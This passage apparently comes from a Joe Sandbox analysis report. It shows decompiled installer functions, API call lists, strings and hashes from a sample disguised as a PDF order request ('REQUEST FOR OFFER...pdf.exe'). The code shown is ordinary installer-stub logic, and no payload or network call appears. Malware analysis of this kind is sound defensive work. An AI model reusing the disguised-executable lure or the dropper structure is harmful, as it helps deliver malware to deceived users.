							} else {
								if(E00405D4C(_t39, _t47, "[Rename]\r\n") != 0) {
									_t50 = E00405D4C(_t39, _t22 + 0xa, "\n[");
									if(_t50 == 0) {
										_t49 =  *(_t54 + 0x18);
										L16:
										_t25 = _t43;
										L17:
										E00405DA2(_t25 + _t47, 0x4269c8, _t38);
										SetFilePointer(_t49, 0, 0, 0);
										E00405E99(_t49, _t47, _t43 + _t38);
										GlobalFree(_t47);
										goto L18;
									}
									_t40 = _t47 + _t43;
									_t32 = _t40 + _t38;
									while(_t40 > _t50) {
										 *_t32 =  *_t40;
										_t32 = _t32 - 1;
										_t40 = _t40 - 1;
									}
									_t25 = _t50 - _t47 + 1;
									_t49 =  *(_t54 + 0x18);
									goto L17;
								}
								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
								_t43 = _t43 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE7(_t45, 0, 1));
					_t13 = GetShortPathNameW(_t45, 0x426dc8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						goto L3;
					}
				}
				return _t13;
			}

0x00405f41
0x00405f50
0x00405f56
0x00405f67
0x00405f8f
0x00405f9a
0x00405f9e
0x00405fbe
0x00405fc5
0x00405fcf
0x00405fdc
0x00405fe1
0x00405fe6
0x00405fea
0x00405ff9
0x00405ffb
0x00406008
0x0040600c
0x004060a7
0x00000000
0x00406022
0x0040602f
0x00406053
0x00406057
0x00406076
0x0040607a
0x0040607a
0x0040607c
0x00406085
0x00406090
0x0040609b
0x004060a1
0x00000000
0x004060a1
0x00406059
0x0040605c
0x00406067
0x00406063
0x00406065
0x00406066
0x00406066
0x0040606e
0x00406070
0x00000000
0x00406070
0x0040603a
0x00406040
0x00000000
0x00406040
0x0040600c
0x00405fea
0x00405f69
0x00405f74
0x00405f7d
0x00405f81
0x00000000
0x00000000
0x00405f81
0x004060b2

APIs

lstrcpyW.KERNEL32(00426DC8,NUL), ref: 00405F50
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,004060D4,?,?), ref: 00405F74
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405F7D

Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E

GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F9A
wsprintfA.USER32 ref: 00405FB8
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405FF3
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406002
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040603A
SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00406090
GlobalFree.KERNEL32(00000000), ref: 004060A1
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004060A8

Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe,80000000,00000003), ref: 00405DEB
Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D

Strings

NUL, xrefs: 00405F4A
%ls=%ls, xrefs: 00405FAE
[Rename], xrefs: 00406022, 00406034

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 222337774-899692902
Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
Instruction ID: 33b5be0cf5b447351be1faad876236776c79ee828f4547529858959512194336
Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
Instruction Fuzzy Hash: 6F3126702407147FC220AB219D09F6B3A9CEF45798F16003BF942F62D2DA7CD8218ABD

Uniqueness

Uniqueness Score: -1.00%

Function 004064A6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004064A6(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405C3D(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405BF3(L"*?|<>/\":", _t5))) == 0) {
							E00405DA2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004064a8
0x004064b1
0x004064c8
0x004064c8
0x004064cf
0x004064db
0x004064db
0x004064de
0x004064e1
0x004064e6
0x004064e8
0x004064f1
0x004064f5
0x00406512
0x0040651a
0x0040651a
0x0040651f
0x00406521
0x00406524
0x00406529
0x0040652a
0x0040652e
0x0040652e
0x0040652f
0x00406536
0x00406538
0x0040653f
0x00000000
0x00000000
0x00406547
0x0040654d
0x00000000
0x00000000
0x00000000
0x0040654d
0x00406552

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,74E03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
CharNextW.USER32(?,?,?,00000000), ref: 00406518
CharNextW.USER32(?,00000000,74E03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
CharPrevW.USER32(?,?,74E03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004064A7
"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe", xrefs: 004064A6
*?|<>/":, xrefs: 004064F8

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3647388309
Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
Instruction ID: 798f9d5398cbdb919d0ccd284a00eb8243013f3251525297edaf214bcc17b89f
Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
Instruction Fuzzy Hash: 30110815801612A5D7307B149C40AB776E8EFA5764F52803FEC8A733C5E77C5CA286AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040433D Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040433D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x0040434f
0x004043e3
0x00000000
0x004043e3
0x00404360
0x00404364
0x00000000
0x00000000
0x0040436a
0x00404373
0x00404376
0x00404376
0x0040437c
0x00404382
0x00404382
0x0040438e
0x00404394
0x0040439b
0x0040439e
0x004043a1
0x004043a3
0x004043a3
0x004043ab
0x004043b1
0x004043b1
0x004043bb
0x004043c0
0x004043c3
0x004043c8
0x004043cb
0x004043cb
0x004043db
0x004043db
0x00000000

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040435A
GetSysColor.USER32(00000000), ref: 00404376
SetTextColor.GDI32(?,00000000), ref: 00404382
SetBkMode.GDI32(?,?), ref: 0040438E
GetSysColor.USER32(?), ref: 004043A1
SetBkColor.GDI32(?,?), ref: 004043B1
DeleteObject.GDI32(?), ref: 004043CB
CreateBrushIndirect.GDI32(?), ref: 004043D5

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction ID: f1e38b434243e48c2b46a4a8fcf45a1f38fac15713e13bd475e5664ee3236b4b
Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
Instruction Fuzzy Hash: F0215171600704ABCB219F68DD48B5BBBF8AF41714F04892DEDD5E26E0D778E904CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402E33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E33(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x418edc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x418edc = 0;
					return _t15;
				}
				__eflags =  *0x418edc; // 0x0
				if(__eflags != 0) {
					return E00406628(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a24c;
				if(_t6 >  *0x42a24c) {
					__eflags =  *0x42a248;
					if( *0x42a248 == 0) {
						_t7 = CreateDialogParamW( *0x42a240, 0x6f, 0, E00402D98, 0);
						 *0x418edc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a2f4 & 0x00000001;
					if(( *0x42a2f4 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00402E17());
						return E00405371(0,  &_v132);
					}
				}
				return _t6;
			}

0x00402e42
0x00402e44
0x00402e4b
0x00402e4e
0x00402e4e
0x00402e54
0x00000000
0x00402e54
0x00402e5c
0x00402e62
0x00000000
0x00402e65
0x00402e6c
0x00402e72
0x00402e78
0x00402e7a
0x00402e80
0x00402ebe
0x00402ec7
0x00000000
0x00402ecc
0x00402e82
0x00402e89
0x00402e9a
0x00000000
0x00402ea8
0x00402e89
0x00402ed4

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402E4E
GetTickCount.KERNEL32 ref: 00402E6C
wsprintfW.USER32 ref: 00402E9A

Part of subcall function 00405371: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
Part of subcall function 00405371: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,00402EAD), ref: 004053CC
Part of subcall function 00405371: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dll), ref: 004053DE
Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C

CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402EBE
ShowWindow.USER32(00000000,00000005), ref: 00402ECC

Part of subcall function 00402E17: MulDiv.KERNEL32(00003F12,00000064,000054D5), ref: 00402E2C

Strings

... %d%%, xrefs: 00402E94

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
Instruction ID: 8dd11ec53df0ba6bdd92dbd1cf8f77c56262218af4b431f1c1abafb00f700e94
Opcode Fuzzy Hash: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
Instruction Fuzzy Hash: FB016570541614DBC7216B50EE0DA9B7B58AB00B45B14413FF941F12D1DBF844A58BEE

Uniqueness

Uniqueness Score: -1.00%

Function 00404C3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404C3B(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404c49
0x00404c56
0x00404c5c
0x00404c9a
0x00404c9a
0x00404ca9
0x00404cb0
0x00000000
0x00404cb2
0x00404c5e
0x00404c6d
0x00404c75
0x00404c78
0x00404c8a
0x00404c90
0x00404c97
0x00000000
0x00404c97
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C56
GetMessagePos.USER32 ref: 00404C5E
ScreenToClient.USER32(?,?), ref: 00404C78
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C8A
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CB0

Strings

f, xrefs: 00404C8C

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction ID: 3ec40d72beee944c7b32a6f5f5203a90e51618c2e0ef94a62ef03edc632050ca
Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
Instruction Fuzzy Hash: 88015271901218BAEB10DF94DD45FFEBBBCAF58711F10012BBA51B61C0C7B499018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C31(2);
				 *((intOrPtr*)(_t35 - 0x50)) = _t30;
				0x40cde0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdf0 = E00402C31(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x50)) = _t30;
				 *0x40cdf7 = 1;
				 *0x40cdf4 = _t15 & 0x00000001;
				 *0x40cdf5 = _t15 & 0x00000002;
				 *0x40cdf6 = _t15 & 0x00000004;
				E00406234(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cde0);
				_push(_t18);
				_push(_t33);
				E00406159();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401db3
0x00401dbe
0x00401dc0
0x00401dcd
0x00401de4
0x00401de9
0x00401df6
0x00401dfb
0x00401dff
0x00401e0a
0x00401e11
0x00401e23
0x00401e29
0x00401e2e
0x00401e38
0x004025a8
0x0040156d
0x00402a81
0x00402ade
0x00402aea

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38

Strings

Times New Roman, xrefs: 00401E1E

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: 989ed94486e184ad55f185056a204e19d2aedfd3c7288f1a0d63de658e69de4b
Instruction ID: 65d3cf27749cc92dd64e462d7a068a1de8cb11dbe253a65c0e26eefc01b1c80e
Opcode Fuzzy Hash: 989ed94486e184ad55f185056a204e19d2aedfd3c7288f1a0d63de658e69de4b
Instruction Fuzzy Hash: B8015271544245EFE7006BB4AF4AA9E7FB5BF55301F14097DE142BA1E2CBB80006AB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402D98 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402D98(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E17();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a250 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402da8
0x00402db6
0x00402dbc
0x00402dbc
0x00402dca
0x00402dcc
0x00402dd8
0x00402ddd
0x00402ddf
0x00402ddf
0x00402dea
0x00402dfa
0x00402e0c
0x00402e0c
0x00402e14

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DB6
wsprintfW.USER32 ref: 00402DEA
SetWindowTextW.USER32(?,?), ref: 00402DFA
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E0C

Strings

unpacking data: %d%%, xrefs: 00402DD8
verifying installer: %d%%, xrefs: 00402DDF, 00402DE8

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
Instruction ID: 5b31381c318dcc107e486aeb82f0cbc8ffe93b2faae57e60c2f54a212ea49e40
Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
Instruction Fuzzy Hash: 53F0367154020CABDF245F50DD49BEA3B69FB44304F00803AFA05B51D0DBB959658B99

Uniqueness

Uniqueness Score: -1.00%

Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100022D0(void* __edx) {
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t42;
				signed int* _t43;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t42 = 0x1a;
					if(_t52 == _t42) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
